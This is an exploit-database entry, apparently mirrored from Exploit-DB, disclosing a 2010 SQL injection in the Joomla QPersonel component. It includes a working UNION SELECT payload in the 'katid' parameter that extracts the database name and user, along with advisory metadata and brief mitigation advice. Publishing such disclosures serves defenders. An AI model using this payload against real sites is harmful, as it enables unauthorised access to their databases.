Joomla Component QPersonel SQL Injection Vulnerability

vendor:

QPersonel

by:

Valentin Hoebel

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: QPersonel

Affected Version From: XSS security fix from 31.12.2009

Affected Version To: 1.02 and before

Patch Exists: YES

Related CWE: N/A

CPE: a:q-proje:qpersonel

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Debian Lenny, MySQL 5

2010

Joomla Component QPersonel SQL Injection Vulnerability

QPersonel is a Joomla component vulnerable to SQL Injection. The vulnerable parameter is 'katid' which can be exploited by appending malicious SQL code to the URL. The vulnerable file is qpersonel.php. Selected information gets displayed within the title tag.

Mitigation:

Input validation should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

# Exploit Title: Joomla Component QPersonel SQL Injection Vulnerability
# Date: 13.04.2010
# Author: Valentin
# Category: webapps/0day
# Version: XSS security fix from 31.12.2009, 1.02 and before
# Tested on: Debian Lenny, MySQL 5
# CVE :  
# Code : 


[:::::::::::::::::::::::::::::::::::::: 0x1 ::::::::::::::::::::::::::::::::::::::]
|:: >> General Information 
|:: Advisory/Exploit Title = Joomla Component QPersonel SQL Injection Vulnerability
|:: By = Valentin Hoebel
|:: Contact = valentin@xenuser.org
|:: 
|:: 
[:::::::::::::::::::::::::::::::::::::: 0x2 ::::::::::::::::::::::::::::::::::::::]
|:: >> Product information
|:: Name = QPersonel
|:: Vendor = Q-PROJE
|:: Vendor Website = http://www.qproje.com/
|:: Affected Versions = XSS security fix from 31.12.2009, 1.02 and before
|:: 
|:: 
[:::::::::::::::::::::::::::::::::::::: 0x3 ::::::::::::::::::::::::::::::::::::::]
|:: >> #1 Vulnerability
|:: Type = SQL Injection
|:: Vulnerable File(s) = qpersonel.php
|:: Vulnerable Parameter(s) = katid
|:: Example URL = index.php?option=com_qpersonel&task=qpListele&katid=XX+AND+1=2+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat(database(),user())--
|:: Selected information gets displayed within the title tag.
|:: 
|:: 
[:::::::::::::::::::::::::::::::::::::: 0x4 ::::::::::::::::::::::::::::::::::::::]
|:: >> Additional Information
|:: Advisory Published = 13.04.2010
|:: 
|:: 
[:::::::::::::::::::::::::::::::::::::: 0x5 ::::::::::::::::::::::::::::::::::::::]
|:: >> Misc
|:: Greetz && Thanks = inj3ct0r team, Exploit DB, hack0wn and ExpBase!
|::
|:: 
[:::::::::::::::::::::::::::::::::::::: EOF ::::::::::::::::::::::::::::::::::::::]